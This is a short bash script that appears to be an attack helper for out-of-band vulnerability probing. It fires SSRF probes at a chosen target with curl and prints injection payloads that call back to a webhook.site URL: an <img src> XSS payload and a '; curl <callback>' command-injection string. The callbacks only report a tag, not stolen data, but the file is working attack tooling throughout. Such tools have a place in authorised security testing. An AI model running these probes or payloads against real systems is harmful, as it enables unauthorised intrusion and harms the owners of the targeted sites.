#!/usr/bin/env bash
set -euo pipefail

usage() {
  cat <<'EOF'
Usage:
  webhook-helper.sh -u <target_url> -i <webhook_uuid> [-m ssrf|xss|cmdi] [-p parameter] [-n marker]

Examples:
  webhook-helper.sh -u 'https://target/fetch' -p url -i 11111111-2222-3333-4444-555555555555 -m ssrf
  webhook-helper.sh -u 'https://target/profile' -i 11111111-2222-3333-4444-555555555555 -m xss
EOF
}

MODE="ssrf"
PARAM="url"
MARKER=""
WEBHOOK_ID=""
TARGET=""

while getopts ":u:i:m:p:n:h" opt; do
  case "$opt" in
    u) TARGET="$OPTARG" ;;
    i) WEBHOOK_ID="$OPTARG" ;;
    m) MODE="$OPTARG" ;;
    p) PARAM="$OPTARG" ;;
    n) MARKER="$OPTARG" ;;
    h) usage; exit 0 ;;
    *) usage >&2; exit 2 ;;
  esac
done

[[ -n "$TARGET" && -n "$WEBHOOK_ID" ]] || { usage >&2; exit 2; }

[[ -n "$MARKER" ]] || MARKER="$(date +%s)"
BASE="https://webhook.site/${WEBHOOK_ID}"
CALLBACK="${BASE}?tag=${MODE}-${MARKER}"

case "$MODE" in
  ssrf)
    echo "[*] Sending SSRF-style probe to ${TARGET}"
    curl -skG "$TARGET" --data-urlencode "${PARAM}=${CALLBACK}"
    ;;
  xss)
    echo "<img src=\"${CALLBACK}\">"
    ;;
  cmdi)
    echo "; curl ${CALLBACK}"
    ;;
  *)
    echo "Unknown mode: $MODE" >&2
    exit 2
    ;;
esac

echo
echo "[*] Track hits at: ${BASE}"
echo "[*] Marker: ${MARKER}"